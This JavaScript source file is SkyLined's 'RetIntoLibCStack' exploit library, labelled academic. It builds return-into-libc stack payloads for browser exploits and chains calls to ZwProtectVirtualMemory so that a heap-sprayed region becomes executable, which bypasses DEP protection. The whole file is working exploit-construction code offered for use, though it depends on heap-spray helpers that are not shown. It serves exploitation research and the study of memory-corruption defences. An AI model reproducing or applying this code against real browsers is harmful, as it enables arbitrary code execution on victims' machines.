/*SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                                                                                                                        
   ,dSSSSSSSSSSSS  SSSS    ,dSSY'  SSSS      SSSS  SSSS          SSSS  SSSSb,    SSSS  ,dSSSSSSSSSSSS  SSSSSSSSSSSSb,   
   SSSS            SSSS  ,dSSY'    SSSS      SSSS  SSSS          SSSS  SSSSSSb,  SSSS  SSSS            SSSS      SSSS   
   'YSSSSSSSSSSb,  SSSSSSSSSSSSb,  'YSSSSSSSSSSSS  SSSS          SSSS  SSSS'YSSb,SSSS  SSSSSSSSSSS     SSSS      SSSS   
             SSSS  SSSS      SSSS            SSSS  SSSS          SSSS  SSSS  'YSSSSSS  SSSS            SSSS      SSSS   
   SSSSSSSSSSSSP'  SSSS      SSSS  SSSSSSSSSSSSP'  'YSSSSSSSSSS  SSSS  SSSS    'YSSSS  'YSSSSSSSSSSSS  SSSS  SSSSSSP'   
                                                                                                                        
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                                                                                                                        
 SploitScripts/RetIntoLibCStack 10.9 - An implementation of "havoc" ret-into-libc attacks for browser exploits.         
 Copyright (c) 2003-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>                                         
 All rights reserved. This information is provided for academic purpose only.                                           
                                                                                                                        
 Redistribution and use in source and binary forms, with or without modification, are permitted provided that the       
 following conditions are met:                                                                                          
    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following  
      disclaimer.                                                                                                       
    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the         
      following disclaimer in the documentation and/or other materials provided with the distribution.                  
    * Neither the name of the copyright holder nor the names of the contributors may be used to endorse or promote      
      products derived from this software without specific prior written permission.                                    
                                                                                                                        
 THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED  
 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT     
 HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES    
 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR         
 BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT   
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE         
 POSSIBILITY OF SUCH DAMAGE.                                                                                            
                                                                                                                        
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS*/

function RetIntoLibCStack(fDwordStringifier, iFreeStackSpace, iRetPops) {
  // Class that represents a ret-into-libc stack, which has iFreeStackSpace bytes unused at the bottom, iRetPops unused
  // DWORDs after the first RET and uses fDwordStringifier to convert a DWORD to a unicode or ascii string.
  // Use addCall(iCallAddress, aiArguments) to add a call to a function to the stack.
  // Use addMakeHeapExecutableCalls(oHeapSpray, iZwProtectVirtualMemoryAddress) to add calls that use 
  // ntdll!ZwProtectVirtualMemory to make the block at the target address of the heap spray executable.
  if (!fDwordStringifier) throw "Missing fDwordStringifier";
  if (!iFreeStackSpace) iFreeStackSpace = 0x200;
  if (iFreeStackSpace % 4) throw "Free stack space must be DWORD aligned!";
  this.fDwordStringifier = fDwordStringifier;
  this.iFreeStackSpace = iFreeStackSpace;
  this.iRetPops = iRetPops || 0;
  this._axCallAddresses = [];
  this._axArguments = [];
  this.addCall = function (iCallAddress, aiArguments) {
    aiArguments = aiArguments || [];
    this._axCallAddresses.push(this.fDwordStringifier(iCallAddress));
    var xArguments = "";
    for (var i = 0; i < aiArguments.length; i++) {
      xArguments += this.fDwordStringifier(aiArguments[i]);
    }
    this._axArguments.push(xArguments);
  }
  this.toString = function() {
    var xStack = strDup(this.iFreeStackSpace / 4, this.fDwordStringifier(0x53535353)); // "S" for stack
    for (var iCall = 0; iCall < this._axCallAddresses.length; iCall++) {
      xStack += this._axCallAddresses[iCall];
      if (iCall == 0) {
        xStack += strDup(this.iRetPops, this.fDwordStringifier(0x53535353));
      } else {
        xStack += this._axArguments[iCall - 1];
      }
    }
    xStack += this._axArguments[iCall - 1];
    return xStack;
  }

  this.addMakeHeapExecutableCalls = function (oHeapSpray, iZwProtectVirtualMemoryAddress) {
    var PAGE_EXECUTE_READWRITE = 0x40;
    if (this.iFreeStackSpace < 0x200) throw "Need more stack space";
    // NTSTATUS NTAPI ZwProtectVirtualMemory(
    //   __in     HANDLE  hProcess,
    //   __inout  PPVOID  lplpAddress,
    //   __inout  PDWORD  lpdwSize,
    //   __in     DWORD   flNewProtect,
    //   __out    PDWORD  lpflOldProtect,
    // )
    // "hProcess" can be set to 0xFFFFFFFF (current process). "lpAddress" and "dwSize", need to be passed by reference.
    // Because "dwSize" is the same for each call, its value can be stored in the heap spray once, and a pointer to the
    // value on the heap can be used for each call. Similarly, one DWORD is reserved on the heap for use with
    // "lpflOldProtect" and the pointer to this DWORD is used in all calls. The value of "lpAddress" is different for
    // each call, so an array containing the various values is constructed on the heap and pointers to the individual
    // values in this array are used in the calls.
    // Create a DWORD on the heap to which the code can write for use with "lpflOldProtect":
    var oWritableDwordHeapData = new HeapData(this.fDwordStringifier(0x33333333));
    var iWritableDwordAddress = oHeapSpray.addData(oWritableDwordHeapData);
    // Create a DWORD on the heap that contains the size of a heap block, for use with "lpdwSize":
    var iHeapBlockSize = oHeapSpray.iChunksPerBlock * oHeapSpray.iChunkSize;
    var oHeapBlockSizeData = new HeapData(this.fDwordStringifier(iHeapBlockSize));
    var iHeapBlockSizeAddress = oHeapSpray.addData(oHeapBlockSizeData);
    // Create an array of DWORDS on the heap, for use with "lplpAddress":
    var oBlockBaseAddressesData = new HeapData(oHeapSpray.iChunksPerBlock * 4);
    var iBlockBaseAddressesDataAddress = oHeapSpray.addData(oBlockBaseAddressesData);
    // Generate calls to NtProtectVirtualMemory to the memory containing the data in the heap spray executable.
    // Because ZwProtectVirtualMemory will only work if the correct start address is provided, which is unknown,
    // multiple calls will be made with all possible values. One of these calls should succeed, the others should
    // fail without consequence. After this, the heap should be executable.
    var uBlockBaseAddresses = "";
    for (var iChunk = 0; iChunk < oHeapSpray.iChunksPerBlock; iChunk++) {
      var iChunkAlignedTargetAddress = oHeapSpray.iTargetAddress - (oHeapSpray.iTargetAddress % oHeapSpray.iChunkSize);
      var iBlockBaseAddress = iChunkAlignedTargetAddress - (iChunk * oHeapSpray.iChunkSize);
      uBlockBaseAddresses += dwordUnicode(iBlockBaseAddress);
      var iBlockBaseAddressAddress = iBlockBaseAddressesDataAddress + iChunk * 4;
      this.addCall(iZwProtectVirtualMemoryAddress, [                    // NTSTATUS NTAPI ZwProtectVirtualMemory(
        0xFFFFFFFF,                                                     //   __in     HANDLE  hProcess
        iBlockBaseAddressAddress,                                        //   IN OUT PPVOID  lplpAddress
        iHeapBlockSizeAddress,                                          //   IN OUT PDWORD  lpdwSize
        PAGE_EXECUTE_READWRITE,                                         //   IN     DWORD   flNewProtect
        iWritableDwordAddress                                           //      OUT PDWORD  lpflOldProtect
      ]);                                                               // )
    }
    oBlockBaseAddressesData.setData(uBlockBaseAddresses);
    return {
      iWritableDwordAddress: iWritableDwordAddress,
      iHeapBlockSizeAddress: iHeapBlockSizeAddress,
      iBlockBaseAddressesDataAddress: iBlockBaseAddressesDataAddress
    };
  }
}